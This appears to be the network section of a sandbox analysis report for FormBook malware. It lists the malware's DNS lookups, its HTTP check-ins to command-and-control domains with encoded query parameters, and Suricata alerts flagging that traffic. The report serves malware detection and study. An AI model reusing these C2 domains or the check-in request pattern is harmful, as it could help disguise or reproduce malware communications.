Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.gdtanhua.icu |
CNAME
256.93cu.com
|
154.12.93.8 |
| www.starsyx.com | ||
| www.bradleymartinfitness.com | ||
| www.districonsumohome.com | 172.67.170.89 | |
| www.ecuajet.net | 23.231.50.47 |
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
GET
301
http://www.districonsumohome.com/tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp
REQUEST
RESPONSE
BODY
GET /tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp HTTP/1.1
Host: www.districonsumohome.com
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Wed, 08 Nov 2023 08:32:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cfsc0lbja5qcp9i9udb0gvek1a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://www.districonsumohome.com/tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp/
X-Site-Id: b06a19763874333f5edff4b04bf679c214e98c722884801262aad1993356293a7f5e1153
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XoaKNWuwbnB2AuCoTMJI4M1pjFZZfpCTk3FfzsIjOKIqQvzOLxvyAOvRoziUAST%2BPEHuhJoVbQPQaNXmLjS8f939L6NraTANxm%2FAUuiSnQFc3weOuRaqJvLJtOp%2FxhZuJLX%2BMbG%2Fd4rw%2Ftct"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 822c77f18d942f51-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://www.gdtanhua.icu/tb8i/?hBZLW8l=5AAXAdZlmcRrCDR+Yfx/EblZaZMinPv2SiPC8X54i0y8Yz2HVSjKC3lJUrpNHrztM6AvkM+R&jL3Tir=_PG0kH6pr8nlATBp
REQUEST
RESPONSE
BODY
GET /tb8i/?hBZLW8l=5AAXAdZlmcRrCDR+Yfx/EblZaZMinPv2SiPC8X54i0y8Yz2HVSjKC3lJUrpNHrztM6AvkM+R&jL3Tir=_PG0kH6pr8nlATBp HTTP/1.1
Host: www.gdtanhua.icu
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Nov 2023 08:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
GET
0
http://www.ecuajet.net/tb8i/?hBZLW8l=K0i+LInbjQMeF01bJpA1pnYCvby0p5ea/1o04Epx1gQSdVWES3s1884re8hJdKUMMJ2T7E8o&jL3Tir=_PG0kH6pr8nlATBp
REQUEST
RESPONSE
BODY
GET /tb8i/?hBZLW8l=K0i+LInbjQMeF01bJpA1pnYCvby0p5ea/1o04Epx1gQSdVWES3s1884re8hJdKUMMJ2T7E8o&jL3Tir=_PG0kH6pr8nlATBp HTTP/1.1
Host: www.ecuajet.net
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.103:64894 -> 164.124.101.2:53 | 2026888 | ET INFO DNS Query for Suspicious .icu Domain | Potentially Bad Traffic |
| TCP 192.168.56.103:49166 -> 104.21.47.35:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49167 -> 154.12.93.8:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49168 -> 23.231.50.47:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts